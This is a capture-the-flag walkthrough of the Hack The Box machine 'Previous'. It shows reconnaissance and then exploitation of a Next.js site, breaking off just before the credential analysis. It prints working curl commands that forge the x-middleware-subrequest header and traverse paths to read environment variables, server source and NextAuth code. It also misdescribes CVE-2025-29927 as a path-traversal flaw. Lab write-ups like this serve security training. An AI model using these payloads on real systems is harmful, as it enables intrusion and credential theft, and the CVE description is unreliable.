🎯 Hack The Box: Previous - Complete Walkthrough & Technical Analysis
📊 Machine Overview
| Property | Value |
|---|---|
| Machine Name | Previous |
| IP Address | 10.10.11.83 |
| Operating System | Linux (Ubuntu) |
| Difficulty | Medium |
| Points | 30 |
| Release Date | August 23, 2025 |
| Domain | previous.htb |
🔍 Initial Reconnaissance
Port Scanning with Nmap
The first step in any penetration test is reconnaissance. We begin by scanning the target to identify open ports and services.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.83
Key Findings:
- Port 22 (SSH): OpenSSH 8.9p1 Ubuntu - Standard SSH service for remote access
- Port 80 (HTTP): nginx 1.18.0 - Web server with automatic redirect to
http://previous.htb/
DNS Configuration
Before proceeding, we need to add the domain to our hosts file:
echo "10.10.11.83 previous.htb" | sudo tee -a /etc/hosts
This ensures our system can resolve the domain name properly.
🌐 Web Application Analysis
Technology Stack Identification
Using whatweb to fingerprint the web application:
whatweb http://previous.htb
Critical Discovery: The application is running Next.js (a React framework) powered by Node.js. This is crucial because Next.js applications have specific vulnerabilities and attack vectors.
HTTP Header Analysis
curl -I http://previous.htb/
Response Headers Reveal:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
X-Powered-By: Next.js
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware...
The X-Middleware-Subrequest header is particularly interesting - it suggests the application uses middleware layers that might be exploitable.
Directory Enumeration
feroxbuster -u http://previous.htb/ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-x php,html,js,json,txt,log \
-t 50 -e
Important Finding: Email address discovered - [email protected] (potential username for later)
We check the website headers ✅
Since it’s Next.js, it might be vulnerable to CVE-2025-29927 (PoC exists) depending on the
version/config.
💥 Vulnerability Discovery: CVE-2025-29927
Understanding the Vulnerability
CVE-2025-29927 is a path traversal vulnerability in Next.js applications that allows attackers to read arbitrary files from the server when certain conditions are met:
- The application has an API endpoint that accepts file parameters
- The middleware doesn't properly sanitize user input
- The
X-Middleware-Subrequestheader can be manipulated
Why This Works
Next.js middleware is designed to process requests before they reach the actual API endpoints. By manipulating the middleware chain through the X-Middleware-Subrequest header, we can bypass security controls.
🔓 Exploitation Phase 1: Information Gathering
Step 1: Discovering the Vulnerable Endpoint
We need to find API endpoints. The /api/ directory is standard in Next.js applications:
dirsearch -u http://previous.htb/api/ \
-w /usr/share/wordlists/dirb/common.txt \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
Result: Found /api/download endpoint
Step 2: Reading Environment Variables
Environment variables often contain sensitive information like API keys, database credentials, or configuration details:
curl -s "http://previous.htb/api/download?example=../../../../../../proc/self/environ" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
| tr '\0' '\n'
Why /proc/self/environ?
- In Linux,
/proc/self/is a symlink to the current process environcontains all environment variables for that process- The
tr '\0' '\n'command converts null bytes to newlines for readability
Critical Information Extracted:
NODE_ENV=production- Application is in production modePWD=/app- Application root directoryPORT=3000- Internal port (nginx proxies to this)HOME=/home/nextjs- Service user's home directory
Step 3: Extracting Application Source Code
Now we know the app is in /app, let's get the server configuration:
curl -s "http://previous.htb/api/download?example=../../../../../../app/server.js" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
This reveals how the Next.js server is configured and initialized.
Step 4: Mapping Application Routes
Next.js stores routing information in manifest files:
curl -s "http://previous.htb/api/download?example=../../../../../../app/.next/routes-manifest.json" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
Key Discovery: Dynamic route /api/auth/[...nextauth] - This is a NextAuth.js authentication endpoint!
🔐 Exploitation Phase 2: Credential Discovery
Understanding NextAuth.js
NextAuth.js is a popular authentication library for Next.js applications. It handles:
- User authentication
- Session management
- OAuth providers
- Credential-based authentication
Extracting the Authentication Logic
The route [...nextauth] uses bracket notation, which needs URL encoding:
curl -s "http://previous.htb/api/download?example=../../../../../../app/.next/server/pages/api/auth/%5B...nextauth%5D.js" \
-H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware"
Analyzing the Minified Code
The response is minified JavaScript, but we can identify the critical authentication logic: